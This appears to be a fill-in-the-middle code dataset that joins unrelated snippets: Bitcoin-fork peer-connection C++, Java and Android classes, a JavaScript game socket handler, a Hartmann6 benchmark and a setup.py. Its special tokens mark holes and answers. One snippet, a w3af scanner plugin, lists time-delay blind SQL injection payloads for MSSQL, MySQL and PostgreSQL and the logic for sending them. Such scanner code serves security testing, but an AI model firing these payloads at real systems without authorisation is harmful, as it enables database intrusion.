channel_ptr node, const std::string& hostname, uint16_t port)
{
if (ec || !node)
{
log_debug(LOG_PROTOCOL)
<< "Failure connecting manually to peer ["
<< authority(hostname, port).to_string() << "] " << ec.message();
// Retry connect.
maintain_connection(hostname, port);
return;
}
manual_connections_.push_back(node);
// Connected!
log_info(LOG_PROTOCOL)
<< "Connection to peer established manually ["
<< authority(hostname, port).to_string() << "]";
// Subscribe to channel stop notifications.
node->subscribe_stop(
strand_.wrap(&protocol::manual_channel_stopped,
this, _1, node, hostname, port));
setup_new_channel(node);
}
void protocol::handle_listen(const std::error_code& ec, acceptor_ptr accept)
{
if (!accept)
return;
if (ec)
{
log_error(LOG_PROTOCOL)
<< "Error while starting listener: " << ec.message();
return;
}
// Listen for connections.
accept->accept(
strand_.wrap(&protocol::handle_accept,
this, _1, _2, accept));
}
void protocol::handle_accept(const std::error_code& ec, channel_ptr node,
acceptor_ptr accept)
{
if (!accept)
return;
// Relisten for connections.
accept->accept(
strand_.wrap(&protocol::handle_accept,
this, _1, _2, accept));
if (ec)
{
if (node)
log_debug(LOG_PROTOCOL)
<< "Failure accepting connection from ["
<< node->address().to_string() << "] " << ec.message();
else
log_debug(LOG_PROTOCOL)
<< "Failure accepting connection: " << ec.message();
return;
}
accepted_channels_.push_back(node);
log_info(LOG_PROTOCOL)
<< "Accepted connection from [" << node->address().to_string() << "] ("
<< accepted_channels_.size() << " total)";
const auto handshake_complete = [this, node](const std::error_code& ec)
{
if (!node)
return;
if (ec)
{
log_debug(LOG_PROTOCOL) << "Failure in handshake from ["
<< node->address().to_string() << "] " << ec.message();
return;
}
// Remove the channel from the accepted list once it stops.
node->subscribe_stop(
strand_.wrap(&protocol::inbound_channel_stopped,
this, _1, node));
setup_new_channel(node);
};
handshake_.ready(node, handshake_complete);
}
void protocol::setup_new_channel(channel_ptr node)
{
if (!node)
return;
const auto handle_send = [node](const std::error_code& ec)
{
if (!node)
return;
if (ec)
{
log_debug(LOG_PROTOCOL) << "Send error ["
<< node->address().to_string() << "] " << ec.message();
}
};
// Subscribe to address messages.
node->subscribe_address(
strand_.wrap(&protocol::handle_address_message,
this, _1, _2, node));
node->send(get_address_type(), handle_send);
// Notify subscribers
channel_subscribe_->relay(error::success, node);
}
template <typename ConnectionsList>
void remove_connection(ConnectionsList& connections, channel_ptr node)
{
auto it = connections.begin();
for (; it != connections.end(); ++it)
if (it->node == node)
break;
BITCOIN_ASSERT(it != connections.end());
connections.erase(it);
}
void protocol::outbound_channel_stopped(const std::error_code& ec,
channel_ptr node, slot_index slot)
{
// We must always attempt a reconnection.
if (ec)
{
if (node)
log_debug(LOG_PROTOCOL)
<< "Channel stopped (outbound) ["
<< node->address().to_string() << "] " << ec.message();
else
log_debug(LOG_PROTOCOL)
<< "Channel stopped (outbound): " << ec.message();
}
// Erase this channel from our list and then attempt a reconnection.
remove_connection(connections_, node);
BITCOIN_ASSERT(connect_states_[slot] == connect_state::established);
modify_slot(slot, connect_state::stopped);
// Attempt reconnection.
try_connect_once(slot);
}
template <typename ChannelsList>
void remove_channel(ChannelsList& channels, channel_ptr node)
{
const auto it = std::find(channels.begin(), channels.end(), node);
BITCOIN_ASSERT(it != channels.end());
channels.erase(it);
}
void protocol::manual_channel_stopped(const std::error_code& ec,
channel_ptr node, const std::string& hostname, uint16_t port)
{
// We must always attempt a reconnection.
if (ec)
{
if (node)
log_debug(LOG_PROTOCOL)
<< "Channel stopped (manual) ["
<< authority(hostname, port).to_string() << "] " << ec.message();
else
log_debug(LOG_PROTOCOL)
<< "Channel stopped (manual): " << ec.message();
}
// Remove from manual connections.
// Timeout logic would go here if we ever need it.
remove_channel(manual_connections_, node);
// Attempt reconnection.
maintain_connection(hostname, port);
}
void protocol::inbound_channel_stopped(const std::error_code& ec,
channel_ptr node)
{
// We do not attempt to reconnect inbound connections.
if (ec)
{
if (node)
log_debug(LOG_PROTOCOL)
<< "Channel stopped (inbound) ["
<< node->address().to_string() << "] " << ec.message();
else
log_debug(LOG_PROTOCOL)
<< "Channel stopped (inbound): " << ec.message();
}
// Remove from accepted connections (no reconnect).
remove_channel(accepted_channels_, node);
}
void protocol::handle_address_message(const std::error_code& ec,
const address_type& packet, channel_ptr node)
{
if (!node)
return;
if (ec)
{
// TODO: reset the connection.
log_debug(LOG_PROTOCOL)
<< "Failure getting addresses from ["
<< node->address().to_string() << "] " << ec.message();
return;
}
log_debug(LOG_PROTOCOL)
<< "Storing addresses from [" << node->address().to_string() << "]";
for (const auto& net_address: packet.addresses)
host_pool_.store(net_address,
strand_.wrap(&protocol::handle_store_address,
this, _1));
// Subscribe to address messages.
node->subscribe_address(
strand_.wrap(&protocol::handle_address_message,
this, _1, _2, node));
}
void protocol::handle_store_address(const std::error_code& ec)
{
if (ec)
log_error(LOG_PROTOCOL) << "Failed to store address: "
<< ec.message();
}
void protocol::fetch_connection_count(
fetch_connection_count_handler handle_fetch)
{
strand_.queue(
std::bind(&protocol::do_fetch_connection_count,
this, handle_fetch));
}
void protocol::do_fetch_connection_count(
fetch_connection_count_handler handle_fetch)
{
handle_fetch(error::success, connections_.size());
}
void protocol::subscribe_channel(channel_handler handle_channel)
{
channel_subscribe_->subscribe(handle_channel);
}
size_t protocol::total_connections() const
{
return connections_.size() + manual_connections_.size() +
accepted_channels_.size();
}
void protocol::set_max_outbound(size_t max_outbound)
{
max_outbound_ = max_outbound;
}
void protocol::set_hosts_filename(const std::string& hosts_path)
{
host_pool_.file_path_ = hosts_path;
}
// Deprecated, this is problematic because there is no enabler.
void protocol::disable_listener()
{
listen_port_ = 0;
}
// Deprecated, should be private.
void protocol::bootstrap(completion_handler handle_complete)
{
}
} // namespace network
} // namespace libgroestlcoin<|fim▁end|> | if (ec)
{ |
<|file_name|>UnitProcessor.java<|end_file_name|><|fim▁begin|>package com.nepfix.sim.elements;
import com.nepfix.sim.core.Processor;
import java.util.Map;
public class UnitProcessor implements Processor {<|fim▁hole|>
private String id;
@Override public void init(String id, Map<String, String> args) {
this.id = id;
}
@Override public String process(String input) {
return input;
}
@Override public String getId() {
return id;
}
}<|fim▁end|> | |
<|file_name|>ApplicationTest.java<|end_file_name|><|fim▁begin|>package sl.hr_client;
import android.app.Application;
import android.test.ApplicationTestCase;
/**
* <a href="http://d.android.com/tools/testing/testing_android.html">Testing Fundamentals</a>
*/
public class ApplicationTest extends ApplicationTestCase<Application> {<|fim▁hole|> public ApplicationTest() {
super(Application.class);
}
}<|fim▁end|> | |
<|file_name|>blind_sqli_time_delay.py<|end_file_name|><|fim▁begin|>'''
blind_sqli_time_delay.py
Copyright 2008 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
from fuzzer import createMutants, createRandNum
import outputManager as om
import vuln as vuln
import knowledgeBase as kb
import severity as severity
import dbms as dbms
from w3afException import w3afException
# importing this to have sendMutant and setUrlOpener
from basePlugin import basePlugin
class blind_sqli_time_delay(basePlugin):
'''
This class tests for blind SQL injection bugs using time delays,
the logic is here and not as an audit plugin because this logic is also used in attack plugins.
@author: Andres Riancho ( [email protected] )
'''
def __init__(self, crawler):
# ""I'm a plugin""
basePlugin.__init__(self, crawler)
# The wait time of the first test I'm going to perform
self._wait_time = 5
# The original delay between request and response
_original_wait_time = 0
def is_injectable( self, freq, parameter ):
'''
Check if "parameter" of the fuzzable request object is injectable or not.
@freq: The fuzzableRequest object that I have to modify
@parameter: A string with the parameter name to test
@return: A vulnerability object or None if nothing is found
'''
# First save the original wait time
_original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
# Create the mutants
parameter_to_test = [ parameter, ]
statement_list = self._get_statements()
sql_commands_only = [ i.sql_command for i in statement_list ]
mutants = createMutants( freq , sql_commands_only, fuzzableParamList=parameter_to_test )
# And now I assign the statement to the mutant
for statement in statement_list:
for mutant in mutants:
if statement.sql_command in mutant.getModValue():
mutant.statement = statement.sql_command
mutant.dbms = statement.dbms
# Perform the test
for mutant in mutants:
# Send
response = self._sendMutant( mutant, analyze=False )
# Compare times
if response.getWaitTime() > (_original_wait_time + self._wait_time - 2):
# Resend the same request to verify that this wasn't because of network delay
# or some other rare thing
_original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
response = self._sendMutant( mutant, analyze=False )
# Compare times (once again)
if response.getWaitTime() > (_original_wait_time + self._wait_time - 2):
# Now I can be sure that I found a vuln, I control the time of the response.
v = vuln.vuln( mutant )
v.setName( 'Blind SQL injection - ' + mutant.dbms )
v.setSeverity(severity.HIGH)
v.setDesc( 'Blind SQL injection was found at: ' + mutant.foundAt() )
v.setDc( mutant.getDc() )
v.setId( response.id )
v.setURI( response.getURI() )
return v
return None
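# Hedged usage sketch -- the fuzzable request 'freq' and the plugin wiring
# are assumptions, not part of this module:
#
#   checker = blind_sqli_time_delay(crawler)   # 'crawler' is hypothetical
#   found = checker.is_injectable(freq, 'id')
#   if found is not None:
#       om.out.vulnerability(found.getDesc())  # assumed reporting call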
def _get_statements( self ):
'''
@return: A list of statements that are going to be used to test for
blind SQL injections. The statements are objects.
'''
res = []
# MSSQL
res.append( statement("1;waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1);waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1';waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )<|fim▁hole|>
# MySQL
# =====
# MySQL doesn't have a sleep function, so I have to use BENCHMARK(1000000000,MD5(1))
# but the benchmarking will delay the response a different amount of time in each computer
# which sucks because I use the time delay to check!
#
# In my test environment 3500000 delays 10 seconds
# This is why I selected 2500000, which is guaranteed to delay at least 8
# seconds; and I only check the delay like this:
# response.getWaitTime() > (_original_wait_time + self._wait_time-2):
#
# With a small wait time of 5 seconds, this should work without problems...
# and without hitting the xUrllib timeout !
res.append( statement("1 or BENCHMARK(2500000,MD5(1))", dbms.MYSQL) )
res.append( statement("1' or BENCHMARK(2500000,MD5(1)) or '1'='1", dbms.MYSQL) )
res.append( statement('1" or BENCHMARK(2500000,MD5(1)) or "1"="1', dbms.MYSQL) )
# PostgreSQL
res.append( statement("1 or pg_sleep("+ str(self._wait_time) +")", dbms.POSTGRE) )
res.append( statement("1' or pg_sleep("+ str(self._wait_time) +") or '1'='1", dbms.POSTGRE) )
res.append( statement('1" or pg_sleep('+ str(self._wait_time) +') or "1"="1', dbms.POSTGRE) )
# TODO: Add Oracle support
# TODO: Add XXXXX support
return res
class statement(object):
def __init__(self, sql_command, dbms):
self.sql_command = sql_command
self.dbms = dbms<|fim▁end|> | res.append( statement("1');waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
res.append( statement("1'));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) ) |
<|file_name|>socket.js<|end_file_name|><|fim▁begin|>var multiplayer = new function(){
this.players = [];
this.add_player = function(player){
console.log("new player");
var scale = [1,1,1];
var data = {};
data['x1'] = 0;
data['y1'] = 0;
elements.add_OBJ(link_mushroom_obj, link_tree_texture, data, scale, "opponent", false, player.id);
};
this.remove_player = function(id){
scene.remove(multiplayer.players[""+id]);
delete multiplayer.players[""+id];
}
};
Arena.when({
playerMove: function (player) {
var local_player = multiplayer.players[""+player.id];
if(local_player == undefined){
return;
}
local_player.position.x = player.x;
local_player.position.y = player.y - 15;
local_player.position.z = player.z;
},
newRegularMushroom: function (position) {
elements.addMushroomWithPosition(position);
},<|fim▁hole|> elements.removeElementPositionMush(position);
},
newPlayer: function (player) {
multiplayer.add_player(player);
},
playerLeft: function (id) {
multiplayer.remove_player(id);
},
newMegaMushroom: function (position) {
position.isMegamush = true;
elements.addMushroomWithPosition(position);
},
updateScore: function (score) {
game.player.points = score[0];
game.opponent.points = score[1];
message.showScore();
},
displayMegaMushroom: function () {
message.showStrobMessage("MEGA MUSH !!",20);
},
displayMushroomWave: function () {
message.showStrobMessage("Vague de champignons !",20);
}
});<|fim▁end|> | pickupMushroom: function (id, team, position) { |
<|file_name|>defs.hpp<|end_file_name|><|fim▁begin|>/**
Copyright (c) 2017, Philip Deegan.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the
distribution.
* Neither the name of Philip Deegan nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef _KUL_DEFS_HPP_
#define _KUL_DEFS_HPP_
#define KSTRINGIFY(x) #x
#define KTOSTRING(x) KSTRINGIFY(x)
#ifdef KUL_SHARED
#if defined _WIN32 || defined __CYGWIN__
#ifdef KUL_EXPORT
#ifdef __GNUC__
#define KUL_PUBLISH __attribute__((dllexport))
#else
#define KUL_PUBLISH __declspec(dllexport)
#endif
#else
#ifdef __GNUC__
#define KUL_PUBLISH __attribute__((dllimport))
#else
#define KUL_PUBLISH __declspec(dllimport)
#endif
#endif
#else
#if __GNUC__ >= 4
#define KUL_PUBLISH __attribute__((visibility("default")))
#define KUL_PRIVATE __attribute__((visibility("hidden")))
#endif
#endif
#endif // KUL_SHARED
#ifndef KUL_PUBLISH
#define KUL_PUBLISH<|fim▁hole|>#define KUL_PRIVATE
#endif
#if defined(__APPLE__) || defined(__NetBSD__) || defined(__FreeBSD__)
#define KUL_IS_BSD 1
#endif
#if defined(_WIN32)
#define KUL_IS_WIN 1
#endif
#ifndef KUL_IS_WIN
#define KUL_IS_WIN 0
#endif
#ifndef KUL_IS_BSD
#define KUL_IS_BSD 0
#endif
#if !KUL_IS_WIN && !KUL_IS_BSD
#define KUL_IS_NIX 1
#endif
#ifndef KUL_IS_NIX
#define KUL_IS_NIX 0
#endif
#if !defined(NDEBUG) || defined(KUL_FORCE_DEBUG_DO)
#define KUL_DEBUG_DO(...) __VA_ARGS__
#define KUL_DEBUG_DO_ELSE(...)
#else
#define KUL_DEBUG_DO(...)
#define KUL_DEBUG_DO_ELSE(...) __VA_ARGS__
#endif
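// Usage sketch for the debug macros above (illustrative only):
//
//   KUL_DEBUG_DO(std::cout << "debug-only trace" << std::endl;)
//   KUL_DEBUG_DO_ELSE(run_release_path();)   // hypothetical function
//
// With NDEBUG defined (and KUL_FORCE_DEBUG_DO undefined) the first line
// compiles away and the second survives; otherwise the reverse holds.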
#include "kul/os/def.hpp"
#endif /* _KUL_DEFS_HPP_ */<|fim▁end|> | #endif
#ifndef KUL_PRIVATE |
<|file_name|>hartmann6.py<|end_file_name|><|fim▁begin|>'''
Created on 14.07.2015
@author: Aaron Klein
'''
import numpy as np
from robo.task.base_task import BaseTask
class Hartmann6(BaseTask):
def __init__(self):
X_lower = np.array([0, 0, 0, 0, 0, 0])
X_upper = np.array([1, 1, 1, 1, 1, 1])
opt = np.array([[0.20169, 0.150011, 0.476874, 0.275332, 0.311652, 0.6573]])
fopt = np.array([[-3.32237]])
<|fim▁hole|> [0.05, 10.00, 17.00, 0.10, 8.00, 14.00],
[3.00, 3.50, 1.70, 10.00, 17.00, 8.00],
[17.00, 8.00, 0.05, 10.00, 0.10, 14.00]])
self.P = 0.0001 * np.array([[1312, 1696, 5569, 124, 8283, 5886],
[2329, 4135, 8307, 3736, 1004, 9991],
[2348, 1451, 3522, 2883, 3047, 6650],
[4047, 8828, 8732, 5743, 1091, 381]])
def objective_function(self, x):
"""6d Hartmann test function
input bounds: 0 <= xi <= 1, i = 1..6
global optimum: (0.20169, 0.150011, 0.476874, 0.275332, 0.311652, 0.6573),
min function value = -3.32237
"""
external_sum = 0
for i in range(4):
internal_sum = 0
for j in range(6):
internal_sum = internal_sum + self.A[i, j] * (x[:, j] - self.P[i, j]) ** 2
external_sum = external_sum + self.alpha[i] * np.exp(-internal_sum)
return -external_sum[:, np.newaxis]
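# Quick sanity check (illustrative; assumes the base class exposes the
# optimum passed to __init__ above as self.opt):
#
#   task = Hartmann6()
#   task.objective_function(task.opt)   # ~ array([[-3.32237]])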
def objective_function_test(self, x):
return self.objective_function(x)<|fim▁end|> | super(Hartmann6, self).__init__(X_lower, X_upper, opt, fopt)
self.alpha = [1.00, 1.20, 3.00, 3.20]
self.A = np.array([[10.00, 3.00, 17.00, 3.50, 1.70, 8.00], |
<|file_name|>setup.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
#
# TheVirtualBrain-Framework Package. This package holds all Data Management, and
# Web-UI helpful to run brain-simulations. To use it, you also need do download
# TheVirtualBrain-Scientific Package (for simulators). See content of the
# documentation-folder for more details. See also http://www.thevirtualbrain.org
#
# (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest")
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the Free
# Software Foundation. This program is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details. You should have received a copy of the GNU General
# Public License along with this program; if not, you can download it here
# http://www.gnu.org/licenses/old-licenses/gpl-2.0
#
#
# CITATION:
# When using The Virtual Brain for scientific publications, please cite it as follows:
#
# Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide,
# Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013)
# The Virtual Brain: a simulator of primate brain network dynamics.
# Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010)
#
#
"""
Install TVB Framework package for developers.
Execute:
python setup.py install/develop
"""<|fim▁hole|>import os
import shutil
import setuptools
VERSION = "1.4"
TVB_TEAM = "Mihai Andrei, Lia Domide, Ionel Ortelecan, Bogdan Neacsa, Calin Pavel, "
TVB_TEAM += "Stuart Knock, Marmaduke Woodman, Paula Sansz Leon, "
TVB_INSTALL_REQUIREMENTS = ["apscheduler", "beautifulsoup", "cherrypy", "genshi", "cfflib", "formencode==1.3.0a1",
"h5py==2.3.0", "lxml", "minixsv", "mod_pywebsocket", "networkx", "nibabel", "numpy",
"numexpr", "psutil", "scikit-learn", "scipy", "simplejson", "PIL>=1.1.7",
"sqlalchemy==0.7.8", "sqlalchemy-migrate==0.7.2", "matplotlib==1.2.1"]
EXCLUDE_INTROSPECT_FOLDERS = [folder for folder in os.listdir(".")
if os.path.isdir(os.path.join(".", folder)) and folder != "tvb"]
setuptools.setup(name="tvb",
version=VERSION,
packages=setuptools.find_packages(exclude=EXCLUDE_INTROSPECT_FOLDERS),
license="GPL v2",
author=TVB_TEAM,
author_email='[email protected]',
include_package_data=True,
install_requires=TVB_INSTALL_REQUIREMENTS,
extras_require={'postgres': ["psycopg2"]})
## Clean after install
shutil.rmtree('tvb.egg-info', True)<|fim▁end|> |